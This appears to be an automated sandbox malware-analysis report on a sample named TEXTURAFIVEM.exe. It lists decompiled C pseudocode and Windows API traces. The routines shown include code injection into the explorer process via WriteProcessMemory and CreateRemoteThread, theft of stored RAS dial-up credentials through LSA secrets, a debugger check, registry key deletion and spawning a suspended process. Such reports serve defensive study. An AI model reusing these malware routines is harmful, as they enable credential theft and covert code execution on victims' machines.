
                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407E40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				void* _t23;
				intOrPtr _t50;
				intOrPtr _t58;
				void* _t59;

				_t59 = __eflags;
				_t55 = __esi;
				_t54 = __edi;
				_t41 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t58);
				_push(0x407ef8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58;
				_push("RasDialParams!");
				E00407CAC( &_v16, __ebx, __ecx);
				_push(_v16);
				_push(0x407f24);
				E00401E10();
				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
				_t60 = _t23;
				if(_t23 != 0) {
					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
					_push(_v8[2]);
					L00407B74();
				}
				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
					_push(_v8[2]);
					L00407B74();
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(E00407EFF);
				return E00401AE4( &_v16, 2);
			}










                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e43
                                    0x00407e45
                                    0x00407e47
                                    0x00407e4b
                                    0x00407e4c
                                    0x00407e51
                                    0x00407e54
                                    0x00407e57
                                    0x00407e5f
                                    0x00407e64
                                    0x00407e67
                                    0x00407e74
                                    0x00407e84
                                    0x00407e89
                                    0x00407e8b
                                    0x00407e99
                                    0x00407ea4
                                    0x00407ea5
                                    0x00407ea5
                                    0x00407ebe
                                    0x00407ecc
                                    0x00407ed7
                                    0x00407ed8
                                    0x00407ed8
                                    0x00407edf
                                    0x00407ee2
                                    0x00407ee5
                                    0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405AD8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t6;
				void* _t8;
				void* _t14;
				void* _t15;

				_t14 = __ecx;
				_t15 = __edx;
				_t8 = __eax;
				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
			}







                                    0x00405ade
                                    0x00405ae0
                                    0x00405ae2
                                    0x00405af4
                                    0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040562C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E0040562C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}







                                    0x00405630
                                    0x0040563c
                                    0x00405640
                                    0x0040564d
                                    0x0040564f
                                    0x00405653
                                    0x00405657
                                    0x00405657
                                    0x00405653
                                    0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004069E4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
				void* _v8;
				char* _t7;
				void** _t11;

				_t7 = __edx;
				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
				RegDeleteKeyA(_v8, _t7);
				return RegCloseKey(_v8);
			}






                                    0x004069e6
                                    0x004069fa
                                    0x00406a05
                                    0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e62
                                    0x00405e64
                                    0x00405e76
                                    0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E18, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e1a
                                    0x00405e1c
                                    0x00405e2e
                                    0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405EAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405EAC(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24070950, Relevance: 6.2, APIs: 4, Instructions: 205librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517715178.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000004.00000002.517707147.0000000024010000.00000002.00000001.sdmp Download File
                                    • Associated: 00000004.00000002.517736735.0000000024071000.00000004.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction ID: fea73935ac89edb1ecb1ad068de3a124fb3e9058189b3824ae919782244a9029
                                    • Opcode Fuzzy Hash: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction Fuzzy Hash: AB512972A553525AE3118A78CCC0E95BBF0EB42234F180778C6E5C73C7E7A459858B6B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004058E0, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
				long _t7;
				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(1);
				return _t7;
			}





                                    0x004058e2
                                    0x004058e4
                                    0x004058f6
                                    0x004058f8
                                    0x004058fe
                                    0x00405901
                                    0x00405907
                                    0x00405907
                                    0x004058fe
                                    0x0040590e
                                    0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA84, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
				void* _t7;

				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
				if(GetLastError() != 0xb7) {
					CloseHandle(_t7);
					return 1;
				} else {
					CloseHandle(_t7);
					return 0;
				}
			}




                                    0x0040ba93
                                    0x0040ba9f
                                    0x0040baac
                                    0x0040bab4
                                    0x0040baa1
                                    0x0040baa2
                                    0x0040baaa
                                    0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: TEXTURAFIVEM.exe PID: 7096 Parent PID: 3440 TEXTURAFIVEM.exeCOMMON

                                    Executed Functions

                                    Function 0040B3C0, Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 304processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				char* _t62;
				intOrPtr* _t71;
				intOrPtr _t91;
				intOrPtr* _t99;
				void* _t104;
				intOrPtr* _t113;
				intOrPtr* _t119;
				intOrPtr* _t124;
				intOrPtr _t129;
				intOrPtr* _t137;
				void* _t142;
				intOrPtr* _t151;
				intOrPtr _t159;
				char* _t161;
				struct HWND__* _t163;
				void* _t168;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t210;
				intOrPtr _t221;
				void* _t236;
				void* _t239;
				void* _t241;

				_t234 = __edi;
				_t194 = __ecx;
				_t185 = __ebx;
				_push(__ebx);
				_push(__esi);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_push(_t239);
				_push(0x40b7a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239 + 0xffffff90;
				_t58 =  *0x40d1cc; // 0x40e924
				_t236 = E00401F9C(_t58);
				_t60 =  *0x40d210; // 0x40e8ec
				_t241 =  *_t60 - 2;
				if(_t241 != 0) {
					_t61 =  *0x40d210; // 0x40e8ec
					__eflags =  *_t61 - 1;
					if(__eflags != 0) {
						_t62 =  *0x40d1b8; // 0x40e8fc
						__eflags =  *_t62 - 1;
						if( *_t62 == 1) {
							__eflags = 0;
							E004013A4(0,  &_v116);
							E00401E94( *0x40f1e8, _v116);
							if(__eflags != 0) {
								_t194 = E00401F48( *0x40f1e8);
								__eflags = 0;
								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
								E0040AFB0(__ebx, _t85, _t236, 0);
								ExitProcess(0);
							}
						}
						_t197 =  *0x40d21c; // 0x40e8f0
						__eflags = 0;
						E004013A4(0, _t197);
						E00403738();
						E00403738();
						_t71 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
						_t91 =  *0x40d21c; // 0x40e8f0
						E00401B14(_t91, _v112);
						E00403738();
						E00403738();
						_t99 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
